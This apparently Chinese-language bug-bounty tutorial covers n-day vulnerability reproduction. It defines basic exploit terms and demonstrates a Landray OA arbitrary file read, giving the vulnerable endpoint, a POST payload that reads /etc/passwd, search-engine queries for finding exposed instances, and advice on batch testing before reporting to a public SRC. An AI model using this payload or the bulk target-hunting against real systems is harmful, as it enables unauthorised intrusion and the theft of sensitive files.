Nday漏洞复现与批量

常见专业术语

  • 0day,也叫零日漏洞(zero-day),通常是指还没有补丁的安全漏洞,零日漏洞得名于开发人员发现漏洞时补丁存在的天数。
  • nday,当软件的补丁发布出来以后,有的管理员并不重视,没有给软件打上新发布的漏洞补丁,这样所产生的漏洞就是俗称的n-day漏洞。
  • poc,是 Proof of Concept 的缩写,中文意思是概念验证,也就是具体项目开展前,对客户的需求进行简单的基础验证,POC 通过后,再向后推进。
  • exp,一般指可利用系统漏洞进行攻击的动作程序。
  • payload,中文‘有效载荷’,指成功exploit之后,攻击代码释放的具有攻击能力的能够实现攻击者目的的代码。

OA漏洞

OA

办公自动化(Office Automation,简称OA)是将现代化办公和计算机技术结合起来的一种新型的办公方式。

常见OA系统

致远OA
蓝凌OA
用友OA
通达OA
泛微OA
金蝶OA
万户OA
华天动力OA
红帆医疗云OA

A. 蓝凌OA任意文件读取漏洞

蓝凌OA(EKP)存在任意文件读取漏洞可能导致敏感信息泄露。

1)漏洞路径

1
/sys/ui/extend/varkind/custom.jsp

访问后抓包,在body中加入payload:

1
var={"body":{"file":"file:///etc/passwd"}}

发送post请求,即可读取到文件。

2)目标寻找

一个是可以通过各大网络安全空间搜索引擎查找哪些网站使用了该软件、服务,另外一个就是可以搜集子域名然后再进行批量。实际上这两种方法都是一样的,只是针对的目标不一样。

360网络空间测绘

1
app:"蓝凌OA系统"

image-20230409134121592

找到目标之后就可以对目标进行测试,如果测试得到的结果和你预期的结果一样,则说明存在漏洞。

fofa

1
app="Landray-OA系统"

奇安信(钱信)
鹰图
钟馗之眼
shodan
傻蛋(安数)

3)批量

批量有两种方法,一种是自己写脚本,另外一种是利用别人写的脚本。比如“蓝凌OA任意文件读取漏洞”,那可以借助github找别人写好的脚本进行批量化测试。

4)漏洞提交

根据不同的网站提交到不同的地方,比如:不属于SRC的资产并且不属于教育行业的资产可以提交到漏洞盒子的公益SRC

https://www.vulbox.com/

在【项目大厅】里搜索即可看到公益SRC

提交漏洞按要求填写即可